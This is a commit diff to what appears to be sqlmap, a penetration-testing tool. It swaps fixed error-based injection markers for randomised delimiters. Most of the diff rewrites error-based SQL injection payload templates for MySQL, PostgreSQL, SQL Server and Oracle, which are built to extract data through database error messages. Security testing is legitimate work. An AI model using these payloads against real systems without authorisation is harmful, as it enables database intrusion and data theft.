Unified start and stop delimiters accross errror-based (detection engine) and union query (--union-test) tests.

bdamele · bdamele · commit 2708aad5040e · 2010-12-01T10:31:50.000Z
diff --git a/lib/core/agent.py b/lib/core/agent.py
@@ -22,8 +22,6 @@
 from lib.core.enums import DBMS
 from lib.core.enums import PLACE
 from lib.core.exception import sqlmapNoneDataException
-from lib.core.settings import ERROR_START_CHAR
-from lib.core.settings import ERROR_END_CHAR
 from lib.core.settings import PAYLOAD_DELIMITER
 
 class Agent:
@@ -33,9 +31,9 @@ class Agent:
 
     def __init__(self):
         kb.misc           = advancedDict()
-        kb.misc.delimiter = randomStr(6)
-        kb.misc.start     = randomStr(6)
-        kb.misc.stop      = randomStr(6)
+        kb.misc.delimiter = randomStr(length=6)
+        kb.misc.start     = ":%s:" % randomStr(length=3, lowercase=True)
+        kb.misc.stop      = ":%s:" % randomStr(length=3, lowercase=True)
 
     def payloadDirect(self, query):
         if query.startswith("AND "):
@@ -163,12 +161,14 @@ def cleanupPayload(self, payload):
         randInt = randomInt()
         randInt1 = randomInt()
         randStr = randomStr()
+        randStr1 = randomStr()
 
         payload = payload.replace("[RANDNUM]", str(randInt))
         payload = payload.replace("[RANDNUM1]", str(randInt1))
         payload = payload.replace("[RANDSTR]", randStr)
-        payload = payload.replace("[ERROR_START_CHAR]", ERROR_START_CHAR)
-        payload = payload.replace("[ERROR_END_CHAR]", ERROR_END_CHAR)
+        payload = payload.replace("[RANDSTR1]", randStr1)
+        payload = payload.replace("[DELIMITER_START]", kb.misc.start)
+        payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
         payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
 
         return payload
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -46,11 +46,9 @@
 DUMP_START_MARKER   = "__START__"
 DUMP_STOP_MARKER    = "__STOP__"
 
-# error based injection markers
+# error-based injection markers
 ERROR_SPACE        = ":_:"
 ERROR_EMPTY_CHAR   = ":x:"
-ERROR_START_CHAR   = ":s:"
-ERROR_END_CHAR     = ":e:"
 
 PAYLOAD_DELIMITER  = "\x00"
 
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
@@ -27,8 +27,6 @@
 
 from lib.core.settings import ERROR_SPACE
 from lib.core.settings import ERROR_EMPTY_CHAR
-from lib.core.settings import ERROR_START_CHAR
-from lib.core.settings import ERROR_END_CHAR
 
 def errorUse(expression, returnPayload=False):
     """
@@ -55,21 +53,20 @@ def errorUse(expression, returnPayload=False):
 
         expressionReplaced               = expression.replace(fieldToCastStr, nulledCastedField, 1)
         expressionUnescaped              = unescaper.unescape(expressionReplaced)
-        startLimiter                     = unescaper.unescape("'%s'" % ERROR_START_CHAR)
-        endLimiter                       = unescaper.unescape("'%s'" % ERROR_END_CHAR)
+        startLimiter                     = unescaper.unescape("'%s'" % kb.misc.start)
+        endLimiter                       = unescaper.unescape("'%s'" % kb.misc.stop)
     else:
         expressionUnescaped              = kb.misc.handler.unescape(expression)
-        startLimiter                     = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR)
-        endLimiter                       = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR)
+        startLimiter                     = kb.misc.handler.unescape("'%s'" % kb.misc.start)
+        endLimiter                       = kb.misc.handler.unescape("'%s'" % kb.misc.stop)
 
     forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
-
     debugMsg = "query: %s" % forgedQuery
     logger.debug(debugMsg)
 
     payload = agent.payload(newValue=forgedQuery)
     result = Request.queryPage(payload, content=True)
-    match = re.search('%s(?P<result>.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)
+    match = re.search('%s(?P<result>.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE)
 
     if match:
         output = match.group('result')
diff --git a/xml/payloads.xml b/xml/payloads.xml
@@ -620,10 +620,10 @@ Formats:
         <clause>1</clause>
         <where>1</where>
         <request>
-            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
+            <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -639,10 +639,10 @@ Formats:
         <clause>1</clause>
         <where>1</where>
         <request>
-            <payload>AND [RANDNUM]=CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC)</payload>
+            <payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>PostgreSQL</dbms>
@@ -657,10 +657,10 @@ Formats:
         <clause>1</clause>
         <where>1</where>
         <request>
-            <payload>AND [RANDNUM]=CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]'))</payload>
+            <payload>AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>Microsoft SQL Server</dbms>
@@ -675,10 +675,10 @@ Formats:
         <clause>1</clause>
         <where>1</where>
         <request>
-            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL)</payload>
+            <payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>Oracle</dbms>
@@ -700,10 +700,10 @@ Formats:
         <clause>2,3</clause>
         <where>1</where>
         <request>
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -719,10 +719,10 @@ Formats:
         <clause>2,3</clause>
         <where>1</where>
         <request>
-            <payload>(CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC))</payload>
+            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>PostgreSQL</dbms>
@@ -737,10 +737,10 @@ Formats:
         <clause>3</clause>
         <where>1</where>
         <request>
-            <payload>(CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]')))</payload>
+            <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>Microsoft SQL Server</dbms>
@@ -755,10 +755,10 @@ Formats:
         <clause>3</clause>
         <where>1</where>
         <request>
-            <payload>(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL)</payload>
+            <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>Oracle</dbms>
@@ -773,10 +773,10 @@ Formats:
         <clause>2,3</clause>
         <where>3</where>
         <request>
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -792,10 +792,10 @@ Formats:
         <clause>2,3</clause>
         <where>3</where>
         <request>
-            <payload>(CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC))</payload>
+            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>PostgreSQL</dbms>
@@ -810,10 +810,10 @@ Formats:
         <clause>3</clause>
         <where>3</where>
         <request>
-            <payload>(CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]')))</payload>
+            <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>Microsoft SQL Server</dbms>
@@ -828,10 +828,10 @@ Formats:
         <clause>3</clause>
         <where>3</where>
         <request>
-            <payload>(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL)</payload>
+            <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>
         <response>
-            <grep>[ERROR_START_CHAR](?P&lt;result&gt;.*?)[ERROR_END_CHAR]</grep>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
         </response>
         <details>
             <dbms>Oracle</dbms>
